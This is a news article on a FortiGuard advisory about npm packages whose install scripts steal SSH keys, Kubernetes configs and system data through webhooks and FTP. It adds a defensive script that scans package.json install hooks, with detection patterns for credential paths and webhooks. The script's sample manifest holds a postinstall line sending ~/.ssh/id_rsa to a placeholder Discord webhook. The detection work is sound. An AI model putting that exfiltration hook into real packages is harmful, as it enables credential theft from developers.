A series of malicious packages hidden within the Node Package Manager (npm), the largest software registry for JavaScript, has been uncovered.
According to a new advisory published by FortiGuard on Monday, the discoveries come as a result of a dedicated system aimed at identifying malicious open-source packages across various ecosystems, including npm and PyPI. These packages have been found to employ deceptive install scripts that run automatically both before and after installation.
FortiGuard security researchers Jin Lee and Jenna Wang explained that the primary objective of these malicious packages is to pilfer sensitive data, including system and user information, through the use of webhooks or file-sharing links. These packages can be categorized into nine sets based on their code and functions.
The first set includes packages that, while obfuscated, exfiltrate sensitive data such as Kubernetes configurations, SSH keys, system fingerprinting details and more.
The second set consists of packages that send HTTP GET requests to specific URLs, scanning for sensitive files and directories containing valuable intellectual property and configuration data, which is then extracted and uploaded to an FTP server.
Subsequent sets follow a similar pattern, using install scripts to steal sensitive data through Discord webhooks, with variations in coding style and execution methods.
The research findings underscore the need for caution among npm users when installing packages. It's crucial to remain vigilant against suspicious install scripts, as these can potentially compromise sensitive information.
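A defender-side check of the kind this advice implies, as an added example that is not from the FortiGuard write-up: it audits a package.json for lifecycle scripts that npm runs automatically at install time and flags any that reference the exfiltration channels described above (webhook URLs, FTP, credential file paths, or a further script launched from the hook). The indicator names and the two sample manifests are constructed for illustration.

```javascript
// Added example: audit an npm manifest's install-time lifecycle scripts.
// npm runs these hooks automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators modelled on the behaviours described in the article:
// webhooks, FTP uploads, HTTP clients, reads of credential files,
// a secondary script launched from the hook, and encoded payloads.
const SUSPICIOUS = [
  { name: "discord-webhook", re: /discord(app)?\.com\/api\/webhooks/i },
  { name: "ftp-upload", re: /\bftp:\/\//i },
  { name: "http-client", re: /\b(curl|wget|fetch|https?\.get)\b/i },
  { name: "credential-path", re: /(\.kube\/config|\.ssh\/|id_rsa|\.npmrc|\.aws\/credentials)/i },
  { name: "spawns-script", re: /\b(node|bash|sh|python)\s+\S*\.(js|sh|py)\b/i },
  { name: "encoded-payload", re: /(base64|eval\(|Buffer\.from\()/i },
];

// Returns one finding per (hook, indicator) match; an empty array means
// no install hook matched any indicator.
function auditLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    for (const { name, re } of SUSPICIOUS) {
      if (re.test(cmd)) findings.push({ hook, indicator: name, command: cmd });
    }
  }
  return findings;
}

// Constructed sample manifests (not real packages; the webhook URL is a placeholder).
const benignPkg = { name: "example-lib", scripts: { test: "mocha" } };
const suspiciousPkg = {
  name: "example-lookalike-lib",
  scripts: {
    preinstall: "node setup.js",
    postinstall: "node collect.js --out https://discord.com/api/webhooks/0/PLACEHOLDER ~/.ssh/id_rsa",
  },
};

// benignPkg yields no findings; suspiciousPkg yields four
// (spawns-script on preinstall; discord-webhook, credential-path and
// spawns-script on postinstall).
const sampleFindings = auditLifecycleScripts(suspiciousPkg);
```

Run it over every node_modules/*/package.json after an install, or install with `npm install --ignore-scripts` and review the flagged hooks before allowing them to run.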
"End users should watch for packages that employ suspicious install scripts and exercise caution," reads the technical write-up. "We will continue hunting for and reporting malicious packages to help users avoid becoming victims."
The original advisory from FortiGuard Labs includes more information about these malicious npm packages and access to Indicators of Compromise (IOCs) related to them.